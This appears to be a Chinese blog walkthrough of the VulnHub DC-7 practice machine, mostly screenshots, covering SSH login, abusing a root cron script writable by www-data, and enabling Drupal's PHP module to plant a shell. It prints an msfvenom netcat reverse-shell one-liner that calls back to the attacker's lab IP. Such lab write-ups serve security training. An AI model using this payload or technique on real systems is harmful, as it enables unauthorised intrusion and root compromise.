靶机下载地址:

https://www.vulnhub.com/entry/dc-7,356/

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。

主机扫描:

Dc:7 Vulnhub Walkthrough Safe 第1张

 

http://10.10.202.161/

Dc:7 Vulnhub Walkthrough Safe 第2张

 

Google搜索下:

Dc:7 Vulnhub Walkthrough Safe 第3张

 

Dc:7 Vulnhub Walkthrough Safe 第4张

 

SSH 登录

Dc:7 Vulnhub Walkthrough Safe 第5张

 

Dc:7 Vulnhub Walkthrough Safe 第6张

Dc:7 Vulnhub Walkthrough Safe 第7张

以上分析得出:此脚本是root每三分钟执行一次,并且www-data用户具有写入权限,因此需要想办法获取此权限,进行写入shell反弹即可

Dc:7 Vulnhub Walkthrough Safe 第8张

 

https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel

Dc:7 Vulnhub Walkthrough Safe 第9张 Dc:7 Vulnhub Walkthrough Safe 第10张

 

Dc:7 Vulnhub Walkthrough Safe 第11张

 

我们点击扩展安装一个PHP的模块

https://www.drupal.org/project/php

Dc:7 Vulnhub Walkthrough Safe 第12张

 

Dc:7 Vulnhub Walkthrough Safe 第13张

 

 Dc:7 Vulnhub Walkthrough Safe 第14张

 

创建基本网页,选择PHP code

Dc:7 Vulnhub Walkthrough Safe 第15张

 

Dc:7 Vulnhub Walkthrough Safe 第16张

 

写入shell

Dc:7 Vulnhub Walkthrough Safe 第17张

 

本地监听获取shell root权限

等了三分钟没shell过来,竟然没执行,这。。。。 换个方式吧

╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe

 

Dc:7 Vulnhub Walkthrough Safe 第18张

 

确认已经写入

Dc:7 Vulnhub Walkthrough Safe 第19张

 

OVER !

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄